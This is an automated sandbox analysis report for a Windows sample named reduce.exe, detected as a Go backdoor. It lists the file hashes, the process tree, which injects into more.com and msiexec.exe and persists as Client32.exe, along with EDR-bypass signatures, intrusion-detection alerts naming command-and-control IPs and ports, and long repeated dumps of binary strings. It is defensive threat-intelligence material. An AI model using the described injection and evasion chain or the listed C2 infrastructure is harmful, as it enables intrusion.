
Windows Analysis Report
reduce.exe

Overview

General Information

Sample name: reduce.exe
Analysis ID: 1568776
MD5: b0f4c61f99716127097da80d07ed6123
SHA1: 310e490a366e2d55b27417f545e4abd575fad0a3
SHA256: fdb10dd37d214b1e9e4258e601a6b3d7a3d9615513b3e0afaad8d9cc09481087
Tags: exe user-smica83
Infos:

Detection

GO Backdoor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Found Tor onion address
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection

Classification

  • System is w10x64
  • reduce.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\reduce.exe" MD5: B0F4C61F99716127097DA80D07ED6123)
    • more.com (PID: 7592 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8024 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Client32.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\jion\Client32.exe" MD5: B0F4C61F99716127097DA80D07ED6123)
    • more.com (PID: 8060 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7204 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: msiexec.exe PID: 8024 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
    Source: Network Connection; Author: frack113; Data: DestinationIp: 46.8.232.106, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8024, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-12-04T23:24:07.286896+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 185.121.233.152 | 28250 | TCP
    2024-12-04T23:24:36.083072+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 185.121.233.152 | 28250 | TCP
    2024-12-04T23:24:36.469876+0100 | 2855538 | 1 | A Network Trojan was detected | 185.121.233.152 | 28250 | 192.168.2.4 | 49763 | TCP
    2024-12-04T23:24:07.286691+0100 | 2855539 | 1 | A Network Trojan was detected | 185.121.233.152 | 28250 | 192.168.2.4 | 49763 | TCP


    AV Detection

    Source: C:\Users\user\AppData\Local\Temp\kupcq; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
    Source: C:\Users\user\AppData\Local\Temp\nfabo; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
    Source: C:\Users\user\AppData\Local\Temp\kupcq; ReversingLabs: Detection: 47%
    Source: C:\Users\user\AppData\Local\Temp\nfabo; ReversingLabs: Detection: 47%
    Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
    Source: Binary string: ntdll.pdb source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdbUGP source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp

    Networking

    Source: Network traffic; Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:28250 -> 192.168.2.4:49763
    Source: Network traffic; Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Network traffic; Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Network traffic; Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:28250 -> 192.168.2.4:49763
    Source: more.com, 00000001.00000002.2007610925.0000000006010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: msiexec.exe, 00000007.00000002.2952726390.00000000034E4000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: more.com, 00000009.00000002.2215145812.0000000005C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: msiexec.exe, 0000000B.00000002.2216154119.0000000002E34000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: kupcq.1.drString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: nfabo.9.drString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: global traffic; TCP traffic: 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Joe Sandbox View; IP Address: 46.8.232.106
    Source: Joe Sandbox View; IP Address: 188.130.206.243
    Source: Joe Sandbox View; ASN Name: IPCORE-ASES
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
